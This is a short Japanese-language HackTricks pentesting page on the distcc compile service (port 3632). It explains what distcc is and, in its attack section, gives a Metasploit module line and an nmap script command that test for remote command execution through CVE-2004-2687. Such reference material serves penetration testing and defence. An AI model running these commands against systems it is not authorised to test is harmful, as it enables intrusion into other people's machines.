hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.9 KiB
Raw Blame History

ゼロからヒーローまでAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricks をサポートする他の方法:

基本情報

Distcc は、ネットワーク内の他のコンピュータのアイドル処理能力を利用して、コンパイルプロセスを強化するツールです。distcc がマシンに設定されると、このマシンはコンパイルタスクを別のシステムに分散することができます。受信システムはdistccdデーモンを実行しており、送信されたコードを処理するために互換性のあるコンパイラをインストールしている必要があります。

デフォルトポート: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

攻撃

CVE-2004-2687 に対して脆弱性があるかどうかをチェックして、任意のコードを実行できるかどうかを確認します:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

このサービスはShodanが検出するとは思いません。

リソース

Álex B (@r1p) によって作成された投稿

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE (HackTricks AWS Red Team Expert)!

HackTricks をサポートする他の方法: